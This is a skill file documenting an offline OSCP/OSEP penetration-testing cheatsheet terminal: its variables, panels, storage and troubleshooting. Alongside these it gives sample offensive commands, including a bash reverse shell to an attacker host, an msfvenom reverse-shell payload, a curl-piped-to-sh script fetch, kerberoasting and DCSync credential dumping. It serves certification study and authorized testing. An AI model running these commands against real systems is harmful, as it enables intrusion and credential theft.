oscp-pentestcheatsheet-terminal

---
name: oscp-pentestcheatsheet-terminal
description: Single-file offline penetration testing cheatsheet terminal with 580+ commands, variable substitution, and engagement tracking for OSCP/OSEP preparation
triggers:
  - how do I use the pentest cheatsheet terminal
  - show me OSCP command reference tool
  - set up pentesting cheatsheet interface
  - configure pentest terminal variables
  - add custom commands to cheatsheet
  - export pentest notes and intel
  - use offline OSCP cheatsheet
  - customize pentesting command reference
---

# OSCP Pentestcheatsheet Terminal Skill

> Skill by [ara.so](https://ara.so) — Security Skills collection

## Overview

The OSCP+ Pentestcheatsheet is a single-file, offline-ready HTML command reference terminal containing 580+ penetration testing commands organized into 28 sections. It features variable substitution, favorites, notes, target intel tracking, and command history — all running locally in your browser with localStorage persistence.

## Installation

```bash
# Clone the repository
git clone https://github.com/anshu19981/Pentestcheatsheet.git
cd Pentestcheatsheet

# Open directly in browser (no build step required)
open index.html
# or
firefox index.html
# or
google-chrome index.html
```

**No dependencies required** — it's a fully self-contained HTML file that works offline.

## Project Structure

```
Pentestcheatsheet/
├── index.html          # Single-file terminal (all functionality)
├── profile.jpg         # Optional profile image
└── README.md
```

## Key Features

### 1. Variable Substitution System

The terminal uses placeholder variables that auto-substitute into every command:

| Variable | Default | Purpose |
|----------|---------|---------|
| `{LHOST}` | `10.10.14.1` | Attacker IP |
| `{RHOST}` | `10.10.10.10` | Target IP |
| `{LPORT}` | `4444` | Listener port |
| `{RPORT}` | `9001` | Target port |
| `{DOMAIN}` | `corp.local` | AD domain |
| `{DC}` | `192.168.1.10` | Domain Controller |
| `{USER}` | `john` | Username |
| `{PASS}` | `Password123` | Password |
| `{HASH}` | `NTLM_HASH_HERE` | NTLM hash |
| `{URL}` | `http://10.10.10.10` | Target URL |

### 2. Command Sections

Commands are organized into 4 major groups:

**OSCP+ Core**: Recon, Web Attacks, API Attacks, Shells, Linux/Windows PrivEsc, Cloud, Pivoting, Password Attacks, OSINT, Wireless, Misc

**Active Directory**: AD Recon, AD Attacks, Lateral Movement, Persistence, ADCS, Advanced Attacks

**OSEP Advanced**: Evasion/OPSEC, Injection, C2 Frameworks, VBA/Office, Binary Analysis

**Post-Exploitation**: Loot/Post-Exploit, Hash Cracking, Buffer Overflow, Tunneling, File Transfer

### 3. UI Interactions

**Keyboard Shortcuts**:
- `Ctrl+K` — Focus search
- `Escape` — Clear search
- `Ctrl+D` — Toggle dark/light mode
- `Ctrl+F` — Open favorites panel

**Per-Command Actions**:
- **Copy** — Copies command with variables substituted
- **1-line** — Converts multiline to single line with `;`
- **★ Star** — Adds to favorites
- **📝 Note** — Adds inline note to command
- **✔ Mark Done** — Tracks completed commands

### 4. Panels

- **🎯 INTEL** — Target intelligence notepad (scope, creds, flags, pivots)
- **📓 NOTES** — Freeform side notes with timestamps
- **⏱ HIST** — Last 20 copied commands
- **★ FAVS** — Starred commands
- **＋ ADD** — Add custom commands

## Usage Patterns

### Basic Workflow

```javascript
// 1. Open index.html in browser
// 2. Set variables at top of page
//    LHOST: 10.10.14.5
//    RHOST: 10.10.10.150
//    LPORT: 443
//    DOMAIN: htb.local

// 3. Navigate to section (e.g., "Shells")
// 4. Click "Copy" on desired command
// Example: Reverse shell command automatically becomes:
//    bash -i >& /dev/tcp/10.10.14.5/443 0>&1

// 5. Paste into terminal and execute
```

### Search Functionality

```javascript
// Press Ctrl+K or click search bar
// Type: "nmap stealth"
// Results filter across all 580+ commands instantly

// Search examples:
// "kerberoasting" → finds all AD kerberoast commands
// "reverse shell" → finds shell commands across sections
// "bloodhound" → finds AD enumeration commands
// "amsi bypass" → finds evasion techniques
```

### Adding Custom Commands

```javascript
// Click "＋ ADD" button
// Fill in form:
{
  "title": "Custom Ligolo Tunnel Setup",
  "command": `# Start ligolo proxy on {LHOST}
sudo ligolo-proxy -selfcert -laddr 0.0.0.0:11601

# On target, upload and run agent
ligolo-agent -connect {LHOST}:11601 -ignore-cert

# In ligolo prompt:
session
ifconfig
listener_add --addr 0.0.0.0:{LPORT} --to 127.0.0.1:445`,
  "tags": ["CRITICAL", "OSEP"]
}

// Command appears in "Custom" section
// Saved to localStorage automatically
```

### Managing Target Intel

```javascript
// Click "🎯 INTEL" panel
// Fill in engagement data:
{
  "engagementName": "HackTheBox - Inception",
  "targetScope": "10.10.10.67\n10.10.10.68",
  "currentObjective": "Privesc via docker escape",
  "credentials": [
    { user: "cobb", pass: "Mr.Inception!", type: "SSH" },
    { user: "administrator", hash: "aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c", type: "NTLM" }
  ],
  "flags": {
    "user": "a5c2ff8b9c2e3d4a1b6789...",
    "root": "b8d4ac7f2e9a1c5d8b4673..."
  },
  "pivotPoints": "10.10.10.67:22 → 172.16.1.10:445",
  "notes": "Docker socket exposed at /var/run/docker.sock"
}

// Click "Export" to save as intel_YYYY-MM-DD.txt
```

### Working with Favorites

```javascript
// Star frequently used commands by clicking ★
// Access via "★ FAVS" panel
// Example favorites workflow:

// 1. Star "Python HTTP Server" from File Transfer
// 2. Star "Nmap Full Port Scan" from Recon
// 3. Star "Impacket psexec.py" from AD Lateral
// 4. Open FAVS panel — all 3 accessible instantly

// Export favorites:
// Click "Export" in FAVS panel → saves favorites.txt
```

### Notes System

```javascript
// Click "📓 NOTES" panel
// Add note:
{
  "title": "AD Attack Path",
  "content": `1. ASREProast on user svc-alfresco
2. WinRM as svc-alfresco
3. BloodHound shows WriteDACL on Exchange Windows Permissions
4. Add svc-alfresco to group → DCSync
5. secretsdump.py for Administrator NTLM`
}

// Each note:
// - Auto-saves on keystroke
// - Shows timestamp
// - Persists across sessions
// - Counts shown in header badge
```

### Command History

```javascript
// Every copied command tracked automatically
// Access via "⏱ HIST" panel
// Shows last 20 copies with timestamps
// Click any history item to re-copy

// Example history view:
// [14:32] nmap -sC -sV -p- 10.10.10.67
// [14:35] chisel server --reverse --port 8080
// [14:38] impacket-secretsdump 'htb.local/admin:P@ssw0rd@10.10.10.67'
```

## Command Examples by Category

### Reconnaissance

```bash
# Full nmap scan with variable substitution
nmap -sC -sV -p- --min-rate=1000 -T4 {RHOST} -oA nmap_full

# Rustscan
rustscan -a {RHOST} -- -sC -sV

# Web fuzzing
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u {URL}/FUZZ -mc 200,301,302,403
```

### Active Directory

```bash
# Kerberoasting
impacket-GetUserSPNs {DOMAIN}/{USER}:{PASS} -dc-ip {DC} -request

# BloodHound collection
bloodhound-python -u {USER} -p {PASS} -ns {DC} -d {DOMAIN} -c All

# DCSync
impacket-secretsdump '{DOMAIN}/{USER}:{PASS}@{DC}'
```

### Shells & Listeners

```bash
# Netcat listener
nc -nvlp {LPORT}

# Bash reverse shell
bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1

# Msfvenom Windows payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o shell.exe
```

### Privilege Escalation

```bash
# Linux SUID enumeration
find / -perm -4000 -type f 2>/dev/null

# Windows token impersonation check
whoami /priv

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```

## Data Persistence

All user data stored in browser `localStorage`:

```javascript
// Storage keys:
cs_favorites        // Starred commands
cs_commandNotes     // Per-command notes
cs_commandsDone     // Completion tracking
cs_targetIntel      // Intel panel data
cs_sideNotes        // Notes panel data
cs_copyHistory      // Command history
cs_customCommands   // User-added commands
cs_theme            // Dark/light preference
cs_variables        // LHOST, RHOST, etc.
```

### Clear All Data

```javascript
// Open browser DevTools (F12)
// Go to: Application → Local Storage → file://
// Delete keys starting with "cs_"

// Or via console:
localStorage.clear()
```

## Customization

### Adding New Section (Modify index.html)

```javascript
// Find sections array in <script> tag
sections.push({
  id: 'custom-recon',
  name: '🔎 Custom Recon',
  group: 'OSCP+ Core',
  commands: [
    {
      title: 'Custom Port Scanner',
      command: 'masscan -p1-65535 {RHOST} --rate=1000 -e tun0',
      tags: ['HIGH']
    }
  ]
});
```

### Changing Default Variables

```javascript
// Locate defaultVariables object in <script>
const defaultVariables = {
  LHOST: '192.168.45.199',    // Your VPN IP
  RHOST: '192.168.45.150',    // Lab target
  LPORT: '443',
  RPORT: '80',
  DOMAIN: 'lab.local',
  DC: '192.168.45.100',
  USER: 'admin',
  PASS: 'P@ssw0rd123',
  HASH: 'aad3b435b51404eeaad3b435b51404ee:...',
  URL: 'http://192.168.45.150'
};
```

## Integration with External Tools

### Export to CherryTree

```javascript
// 1. Open INTEL panel
// 2. Fill in all engagement data
// 3. Click "Export" → saves intel_YYYY-MM-DD.txt
// 4. Import into CherryTree as plain text node

// Or export favorites:
// FAVS panel → Export → favorites.txt
// Import as code block in CherryTree
```

### Use with tmux/Terminal

```bash
# Split tmux pane
tmux split-window -h

# Left pane: Browser with cheatsheet
# Right pane: Terminal for execution

# Workflow:
# 1. Copy command from cheatsheet
# 2. Switch to terminal pane (Ctrl+b →)
# 3. Paste and execute
# 4. Copy output, switch back (Ctrl+b ←)
# 5. Add output to NOTES panel
```

## Troubleshooting

### Variables Not Substituting

```javascript
// Check if variables bar is filled
// Look for red outline on empty required fields

// Manual verification:
// Copy a command, check if {LHOST} is replaced
// If not, reload page: Ctrl+Shift+R (hard refresh)
```

### localStorage Not Persisting

```javascript
// Check browser privacy settings
// Firefox: Preferences → Privacy → History → "Remember history"
// Chrome: Settings → Privacy → Cookies → Allow all

// If using Private/Incognito mode:
// Data will NOT persist between sessions
```

### Export Button Not Working

```javascript
// Check browser console (F12 → Console)
// Common issue: popup blocker

// Solution:
// Allow popups from file:// or localhost
// Or: Right-click Export → Save Link As
```

### Search Not Finding Commands

```javascript
// Search is case-insensitive and searches:
// - Command titles
// - Command content
// - Section names

// If no results:
// 1. Clear search (Escape)
// 2. Try alternate keywords
//    "kerberos" instead of "kerberoasting"
//    "shell" instead of "reverse shell"
```

### Dark Mode Not Saving

```javascript
// Theme preference stored in localStorage
// Key: cs_theme

// Manual fix:
localStorage.setItem('cs_theme', 'dark')  // or 'light'
location.reload()
```

## Best Practices

1. **Set variables first** — Fill LHOST, RHOST before using any commands
2. **Star essentials** — Favorite your go-to commands for quick access
3. **Use INTEL panel** — Track creds and flags as you find them
4. **Export regularly** — Backup intel and notes to text files
5. **Custom commands** — Add your own tools and one-liners
6. **History review** — Check HIST panel to verify what you've run
7. **Offline first** — Download and use locally, not from GitHub Pages
8. **Clean data** — Clear localStorage between engagements for OPSEC

## Security Considerations

- **Air-gapped safe** — Fully offline after initial load
- **No telemetry** — Nothing sent to external servers
- **Local storage only** — All data in browser localStorage
- **Authorized use only** — Tool for legal penetration testing only
- **Clear data** — Remember to clear sensitive intel after engagement

## Additional Resources

- **Project repo**: https://github.com/anshu19981/Pentestcheatsheet
- **Live demo**: https://anshu19981.github.io/Pentestcheatsheet/
- **Author**: [Anshuman Jha LinkedIn](https://www.linkedin.com/in/anshuman-jha-86bbb9202/)

This cheatsheet terminal is designed for OSCP/OSEP exam preparation and professional penetration testing engagements. Use it as your command reference hub during engagements, HTB machines, or certification exams.